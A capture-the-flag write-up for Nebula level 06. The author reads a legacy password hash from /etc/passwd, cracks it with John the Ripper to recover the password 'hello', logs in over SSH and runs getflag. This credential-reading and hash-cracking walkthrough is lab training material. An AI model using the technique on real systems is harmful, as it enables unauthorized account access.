Question URL: https://exploit.education/nebula/level-06/

Information gathering:
a. Take a look at /etc/passwd as flag06 is using legacy password format.
In old days, user passwords were encrypted within /etc/passwd without using /etc/shadow.

level06@nebula:/home/flag06$ ls -al
total 9
drwxr-x--- 1 flag06 level06   80 2019-02-09 06:07 .
drwxr-xr-x 1 root   root     180 2012-08-27 07:18 ..
-rw------- 1 flag06 flag06    17 2019-02-09 06:07 .bash_history
-rw-r--r-- 1 flag06 flag06   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag06 flag06  3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag06 flag06    60 2019-02-09 06:05 .cache
-rw-r--r-- 1 flag06 flag06   675 2011-05-18 02:54 .profile
level06@nebula:/home/flag06$ more /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh


Sol.
a. Now we know the encrypted user password of the user flag06, we can try decrypt it.
I used John The Ripper free version.

C:\Users\ckim\Downloads\john179w2\john179\run>more mypass.txt
ueqwOCnSGdsuM

C:\Users\ckim\Downloads\john179w2\john179\run>john.exe mypass.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello            (?)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 7111  trying: 123456 - marley
Use the "--show" option to display all of the cracked passwords reliably

b. SSH as the user flag06 with the found password, hello
level06@nebula:/home/flag06$ ssh flag06@localhost

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


flag06@localhost's password:
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

flag06@nebula:~$ getflag
You have successfully executed getflag on a target account
flag06@nebula:~$
